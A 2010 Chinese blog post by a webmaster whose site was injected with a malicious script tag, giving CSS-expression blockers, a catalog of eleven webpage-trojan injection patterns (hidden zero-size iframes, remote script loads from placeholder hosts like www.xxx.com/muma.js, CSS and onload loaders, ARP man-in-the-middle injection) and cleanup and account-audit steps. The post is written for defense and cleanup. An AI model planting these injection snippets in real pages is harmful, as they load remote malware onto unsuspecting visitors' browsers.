如果網(wǎng)站被掛馬,又找不到被掛馬的網(wǎng)頁(yè)嗎可以在網(wǎng)頁(yè)中插入以下代碼
<script>
iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*這行代碼是解決掛IFRAME木馬的哦*/
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木馬被成功隔離!'):'');}</script>
原理:將<script>標(biāo)記的src拿出來(lái)轉(zhuǎn)為小寫,再看是不是以“http”開頭的外域JS腳本文件,如果是,則頁(yè)面內(nèi)容清空并寫出“木馬被成功隔離!”。反之正常顯示。
缺點(diǎn):訪客無(wú)法看到被感染了<script>木馬的頁(yè)面。
解決方案2:
<script>
iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}
<script>
原理:將外域的JS文件的document.write()使用document.close()強(qiáng)制關(guān)閉。木馬內(nèi)容還沒有來(lái)得及寫完,只有部分被強(qiáng)制緩存輸出了,剩下的不會(huì)再寫了。
這幾天,vich在寫一個(gè)程序,意外中發(fā)現(xiàn)vich的排名下降了很多,流量也很少!分析了下HTML代碼,在</html>后多了一句“<script src=http://ntrjj.cn></script>”的代碼!一直是以為用的是免費(fèi)空間的原因,在咨詢空間的負(fù)責(zé)人后發(fā)現(xiàn)并不是那樣 -_-! 網(wǎng)站被掛馬了,今天從ftp里找到了所有的“<script src=http://ntrjj.cn></script>”,并刪除掉,可原因并沒有找到,在這里vich搜集了點(diǎn)兒幾種清除網(wǎng)頁(yè)木馬的方法,希望能幫助有如同我一樣遭遇的網(wǎng)友-----
一、首先要確認(rèn)是什么網(wǎng)頁(yè)木馬,可以從殺毒軟件中獲得信息,通過(guò)他的癥狀判斷是哪一種類型的木馬。
二、通常網(wǎng)頁(yè)木馬的代碼都是是這樣的,我提供一些資料希望對(duì)大家有幫助,以便查看網(wǎng)馬的代碼是哪段
1:框架掛馬
<iframe src=地址 width=0 height=0></iframe>
2:js文件掛馬
首先將以下代碼
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存為xxx.js,
則JS掛馬代碼為
<script language=javascript src=xxx.js></script>
3:js變形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后綴
4:body掛馬
<body onload="window.location='地址';"></body>
5:隱蔽掛馬
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n
<iframe http://www.xxx.com/muma.htm/">'">http://www.xxx.com/muma.htm/"></iframe>';
6:css中掛馬
body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}
7:JAJA掛馬
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,
menubar=no,scro llbars=no,width=1,height=1");
</script>
8:圖片偽裝
<html>
<iframe src="網(wǎng)馬地址" height=0 width=0></iframe>
<img src="圖片地址"></center>
</html>
9:偽裝調(diào)用:
<frameset rows="444,0" cols="*">
<frame src="打開網(wǎng)頁(yè)" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="網(wǎng)馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
10:高級(jí)欺騙
<a href=http://www.163.com(迷惑連接地址,顯示這個(gè)地址指向木馬地址)
onMouseOver="www_163_com(); return true;"> 頁(yè)面要顯示的內(nèi)容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="網(wǎng)馬地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,
menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
11: 超級(jí)網(wǎng)馬—通過(guò)arp欺騙來(lái)直接掛馬
原理:arp中間人攻擊,實(shí)際上相當(dāng)于做了一次代理。
正常時(shí)候: A---->B ,A是訪問(wèn)的正常客戶,B是要攻擊的服務(wù)器,C是被我們控制的主機(jī)
arp中間人攻擊時(shí)候: A---->C---->B
B---->C---->A
實(shí)際上,C在這里做了一次代理的作用
那么HTTP請(qǐng)求發(fā)過(guò)來(lái)的時(shí)候,C判斷下是哪個(gè)客戶端發(fā)過(guò)來(lái)的包,轉(zhuǎn)發(fā)給B,然后B返回HTTP響應(yīng)的時(shí)候,在HTTP響應(yīng)包中,插入一段掛馬的代碼,比如 <iframe>...之類,再將修改過(guò)的包返回的正常的客戶A,就起到了一個(gè)掛馬的作用.在這個(gè)過(guò)程中,B是沒有任何感覺的,直接攻擊的是正常的客戶A,如果A是管理員或者是目標(biāo)單位,就直接掛上馬了。)
以上是比較歷害的網(wǎng)頁(yè)木馬代碼
三、 種了木馬如何處理呢?
1、找到嵌入的網(wǎng)頁(yè)木馬文件。以下,拿自己的經(jīng)歷說(shuō)事。找到的文件是wm.htm
2、在注冊(cè)表中查找wm.htm。很幸運(yùn),找到了。開始順藤摸瓜...
3、修改鍵值wm.htm為wm_nnd.htm。
4、再次查找wm.htm。很不幸,又查到了。說(shuō)明有服務(wù)程序在作怪。嘿嘿,有意外發(fā)現(xiàn)。cain.exe,據(jù)說(shuō)是密碼嗅探器。
5、修改鍵值cain.exe為cain_nnd.exe。
6、查找cain.exe,仍然可以查到。嘻嘻,在預(yù)料之中。
7、懷疑wm.htm與cain.exe同流合污,背后有服務(wù)程序作后臺(tái)。
8、快查查看,系統(tǒng)服務(wù)程序。在運(yùn)行->msconfig 或直接在命令行使用net start,查看可疑程序
9、發(fā)現(xiàn)temp*.exe(全名記不清了),立馬net stop server 。
10、快去修改鍵值wm.htm為wm_nnd.htm,cain.exe為cain_nnd.exe。
11、再次查找wm.htm或cain.exe,沒有找到。哈哈,很好。
12、觀察了幾天,沒再發(fā)生掛馬的現(xiàn)象。
四、通過(guò)檢測(cè)網(wǎng)絡(luò)連接查看服務(wù)器是否中了木馬或病毒
1、使用netstat -an 查看所有和本地計(jì)算機(jī)建立連接的IP。
2、連接包含四個(gè)部分——proto(連接方式)、local address(本地連接地址)、foreign address(和本地建立連接的地址)、state(當(dāng)前端口狀態(tài))。 通過(guò)這個(gè)命令的詳細(xì)信息,可以完全監(jiān)控計(jì)算機(jī)上的連接,從而達(dá)到控制計(jì)算機(jī)的目的。
3、手工制作bat程序,生成網(wǎng)絡(luò)連接日志文件供站長(zhǎng)分析:bat文件代碼如下
REM 注釋:監(jiān)控的時(shí)間
time /t>>Netstat.log
REM 每隔30秒,把服務(wù)器上通過(guò)tcp協(xié)議通訊的IP和端口寫入日志文件
Netstat -n -p tcp 30>>Netstat.log
注意:要謹(jǐn)慎使用,這會(huì)給服務(wù)器帶來(lái)性能影響。最好,在服務(wù)器發(fā)生異常,懷疑中木馬或病毒時(shí),用來(lái)分析網(wǎng)絡(luò)連接日志。
僅僅這些還不夠,說(shuō)說(shuō)更嚴(yán)重的:
1、可惡的攻擊者喜歡使用克隆賬號(hào)的方法來(lái)控制你的計(jì)算機(jī)。“它們”激活一個(gè)系統(tǒng)中的默認(rèn)賬戶,但這個(gè)賬戶是不經(jīng)常用的, 然后使用工具把這個(gè)賬戶提升到管理員權(quán)限,從表面上看來(lái)這個(gè)賬戶還是和原來(lái)一樣,但是這個(gè)克隆的賬戶卻是系統(tǒng)中最大的安全隱患。
2、趕快檢測(cè)系統(tǒng)帳戶:
a、在命令行下輸入net user,查看計(jì)算機(jī)上有些什么用戶。
b、使用“net user 用戶名”查看這個(gè)用戶屬于什么權(quán)限的及登錄時(shí)間等。
c、一般除了Administrator是administrators組的,如果你發(fā)現(xiàn)一個(gè)系統(tǒng)內(nèi)置的用戶是屬于administrators組的,那么別人在你的計(jì)算機(jī)上克隆賬戶的概率為90%。
d、是使用“net user 用戶名 /del” 來(lái)刪掉這個(gè)用戶,還是修改其它配置,這你說(shuō)了算。
posted on 2010-06-05 12:25
sanmao 閱讀(125)
評(píng)論(0) 編輯 收藏